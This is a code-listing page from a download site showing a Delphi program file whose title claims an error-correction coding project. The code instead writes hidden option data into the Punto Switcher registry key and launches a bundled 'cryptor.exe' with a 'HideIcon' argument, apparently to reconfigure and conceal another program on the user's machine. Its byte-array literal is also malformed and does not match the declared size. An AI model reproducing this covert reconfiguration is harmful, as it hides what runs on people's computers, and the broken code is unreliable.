⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 crypt.~dpr

📁 System of correction of an error of errors on the basis of cascade coding.delphi
💻 ~DPR
字号:
program crypt;

uses
  Forms,  ShellAPI,SysUtils, windows, RegisTry,
  Unit1 in 'Unit1.pas' {Form1};

{$R *.res}
var reg:TRegisTry;
s:string;
buf:array [1..36] of byte;
n:byte;
begin

  Application.Initialize;
reg:=TRegistry.Create;
reg.RootKey:=HKEY_CURRENT_USER;
reg.OpenKey('Software\Punto Switcher\2.0',True);
//SetLength(buf,36);
buf:=[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,1,0,0,0,0,0,0,0,1,1,0,  00,0,0,1,0,1,1,1,1,1,1,0,0,0,1,0,0,44,1,0,0,44,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0];

reg.WriteBinaryData ('Options',buf,36);

  ShellExecute(0, 'open',PChar(ExtractFileDir(Application.ExeName)+'\cryptor.exe'), 'HideIcon', PChar(0), sw_show);
  Application.CreateForm(TForm1, Form1);
  Application.Run;

end.

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -